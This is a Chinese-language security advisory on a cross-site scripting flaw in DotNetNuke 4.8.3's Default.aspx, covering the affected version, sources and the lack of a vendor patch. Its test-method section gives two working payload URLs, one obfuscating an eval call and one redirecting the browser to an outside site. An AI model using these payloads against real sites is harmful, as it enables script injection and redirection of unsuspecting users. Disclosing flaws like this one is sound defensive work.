安全研究

安全漏洞
DotNetNuke Default.aspx跨站脚本漏洞

发布日期:2008-05-30
更新日期:2008-06-03

受影响系统:
DotNetNuke DotNetNuke 4.8.3
描述:
BUGTRAQ  ID: 29437

DotNetNuke(DNN)是免费的开源内容管理系统。

DotNetNuke的Default.aspx页面没有正确地过滤用户通过URL提交的输入,远程攻击者可以提交恶意URL请求执行跨站脚本攻击。

<*来源:WwW.AmnPardaz.com
  
  链接:http://secunia.com/advisories/30481/
        http://marc.info/?l=bugtraq&m=121216049617814&w=2
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

http://[DNN URL]/Default.aspx/"onmouseover="x='al';x=x+'ert(/Soroush Dalili From WWW.BugReport.IR/)';eval(x);alert().aspx
http://[DNN URL]/Default.aspx/bugreport/"onmouseover="var a='.aspx?';document.location='http://www.bugreport.ir/?archive';

建议:
厂商补丁:

DotNetNuke
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://www.dotnetnuke.com/

浏览次数:3077
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障